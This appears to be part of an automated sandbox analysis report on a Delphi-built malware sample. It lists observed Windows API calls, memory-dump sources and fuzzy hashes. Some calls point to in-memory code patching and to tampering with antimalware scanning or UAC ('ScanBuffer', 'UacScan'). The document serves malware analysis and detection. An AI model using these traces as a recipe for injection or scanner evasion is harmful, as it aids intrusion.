                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 986138563-0
                                                                                                                                • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                • Instruction ID: 52ec3ed92abf5c86fe2e09f386c8718117f591d01557897fc6ce4818e05abfed
                                                                                                                                • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                • Instruction Fuzzy Hash: 5FE017F82152056EEF186F25DD40B3B373AEFC2741BE484E9A940CA164DB3CD840AE78
                                                                                                                                APIs
                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 02B273DA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeString
                                                                                                                                • String ID: H
                                                                                                                                • API String ID: 3341692771-2852464175
                                                                                                                                • Opcode ID: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
                                                                                                                                • Instruction ID: ffe24a56b4168493fdef9377ecc37c51d95c0c553f498a8a1f70b13c89e80fff
                                                                                                                                • Opcode Fuzzy Hash: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
                                                                                                                                • Instruction Fuzzy Hash: CFB1E474A017189FDB14CF99D580A9DFBF2FF89314F2481A9E849AB360DB30A849DF54
                                                                                                                                APIs
                                                                                                                                • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B1E781
                                                                                                                                  • Part of subcall function 02B1E364: VariantClear.OLEAUT32(?), ref: 02B1E373
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearCopy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 274517740-0
                                                                                                                                • Opcode ID: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                                • Instruction ID: 31705c05396b3093132a35808ecb0407729877560101d150f040d0c1827d8464
                                                                                                                                • Opcode Fuzzy Hash: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                                • Instruction Fuzzy Hash: C111C8307102108BE735AF29C8C8A6677DBEF8575079084E6ED4B8F215DB30EC41DB62
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1927566239-0
                                                                                                                                • Opcode ID: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
                                                                                                                                • Instruction ID: aac2e1a7479b28b3d4be163968fb7e115db2a87ac9fdc6a70b521e5dc32b1f5b
                                                                                                                                • Opcode Fuzzy Hash: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
                                                                                                                                • Instruction Fuzzy Hash: 38317171A00209AFDB14DFA8D886AAE77F8EB0C304F8844E5FD09D7250D734EA50CBA5
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                  • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                                • FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1478290883-0
                                                                                                                                • Opcode ID: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
                                                                                                                                • Instruction ID: 401c5546b03e7ac287ec388b66642f19348bdca534cc7cf9fffcb5614c4529ea
                                                                                                                                • Opcode Fuzzy Hash: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
                                                                                                                                • Instruction Fuzzy Hash: C02157F0694310AFEB00F7B4DD02B9DB7EADB05740F9044E0F608E7190DE749905AA1D
                                                                                                                                APIs
                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                                  • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeFromProgString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4225568880-0
                                                                                                                                • Opcode ID: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
                                                                                                                                • Instruction ID: 4a4b92f9f1f1dedc7eb8ea25957ab6f61ee95683d80a25ff4dff7ca629b22b25
                                                                                                                                • Opcode Fuzzy Hash: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
                                                                                                                                • Instruction Fuzzy Hash: 4CE0ED7520031CBBE711EB62DC42D8E7BBDDB8A750B9104F1F804A3610EA31AE048860
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B15886
                                                                                                                                  • Part of subcall function 02B15ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                                  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                                  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                                  • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                                  • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                                  • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                                  • Part of subcall function 02B15ACC: RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2796650324-0
                                                                                                                                • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                • Instruction ID: 7c9d9dffa2493a11e4723fb4feeb4da078b4d5d2d69a9d08b4af680170e4844a
                                                                                                                                • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                • Instruction Fuzzy Hash: EBE09271A003148FCB20DE9CC8C0B4633D8AF48750F840AA1ED68CF346D7B0D9608BD0
                                                                                                                                APIs
                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B17DF4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                • Instruction ID: d311b245ac91300b6e3f49358a685782d7e933ed16b4da00ed8024326a8731f9
                                                                                                                                • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                • Instruction Fuzzy Hash: 16D05BB63091507AE224965A5D44EA75BDCCFC6770F50067DF558C7180D7208C01C671
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                • Instruction ID: 632a84800eedb7547e335e22df8e8bc69168021fc75e2a83c2b73d2cf3e45fdf
                                                                                                                                • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                • Instruction Fuzzy Hash: 2DC08CF32112010E1E60A9BC1CC425963CD8B842347E01EE1E438CB2C9DB1698663820
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                • Instruction ID: d7cffd8e024f7b8f43385001079872a4dbc1099a3c00f1deb60213e392578619
                                                                                                                                • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                • Instruction Fuzzy Hash: 16C08CE22012000A5A5069BC2CC428952CE8B042383F40AE1A438C72E6DB2298A63850
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                • Instruction ID: b8adcb66bebd1b3e48b5fa80b4c996f08707cfa31f9fb7caba0fef6273ec1ac8
                                                                                                                                • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                • Instruction Fuzzy Hash: 55C012A26102305BEB219AA9ACC0B5262ECDB093A9B9800E1A908DB254E36498008AA0
                                                                                                                                APIs
                                                                                                                                • timeSetEvent.WINMM(00002710,00000000,02B3C350,00000000,00000001), ref: 02B3C36C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Eventtime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2982266575-0
                                                                                                                                • Opcode ID: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                                • Instruction ID: 39911893dd863e4479374ed1cf27a7928856dffec38f1e797a8c7f914e773a37
                                                                                                                                • Opcode Fuzzy Hash: a137e6f06a96d74b7f3f0bdf43336006e5c015fd4fa38c76e488d3fdd41733e3
                                                                                                                                • Instruction Fuzzy Hash: CEC092F27D03003AFA1196A55CC2F732A9DD705B14F608592B704FE2C1D2F36C104E68
                                                                                                                                APIs
                                                                                                                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B14C3F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2525500382-0
                                                                                                                                • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                • Instruction ID: 80e7b4fa2771d971173456c0e5e36c09b9ea44270529d425196c900267da826c
                                                                                                                                • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                • Instruction Fuzzy Hash: FDB0127421C24116FE5C22620F00773009C8B41386FC800D19F18C80D0FB04C0018835
                                                                                                                                APIs
                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02B14C57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                • Instruction ID: 7fab6391d8bb3388698cf6e1a0aeee282a6f682a804cd6c57ff98dd133c6f0ed
                                                                                                                                • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                • Instruction Fuzzy Hash: A1A011A82002020A8A0A222C002002A2232AFC23003C8C0E80A000A0008A2A8000A8A0
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B11A03,?,02B12000), ref: 02B115E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                                • Instruction ID: 03fe3878f1d59a8ade3a4162fc87491624ccb50e7479ac0ca99848020e6f1941
                                                                                                                                • Opcode Fuzzy Hash: add1d25e9b06a38976e9739ab60de12cb0c8c68fa94a6485f583b1dc406359c0
                                                                                                                                • Instruction Fuzzy Hash: AEF04FF0B513004FDB09CFB99A503017BF2E78A388F508579D609DB384E77684028B00
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B12000), ref: 02B116A4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                                • Instruction ID: 2fea4167986781ebe706da96ff5ffa9d6f742aa5bbf9454daf73e14205420667
                                                                                                                                • Opcode Fuzzy Hash: e687c5fe1affb83ddd0f8a8948e26b7330121b7f1f5df0ed158d2557d344ef44
                                                                                                                                • Instruction Fuzzy Hash: E2F0BEB2B407956BDB109F6E9C80B82BB98FB003A4F454179FA4CDB340D776A8108BD4
                                                                                                                                APIs
                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B11FE4), ref: 02B11704
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
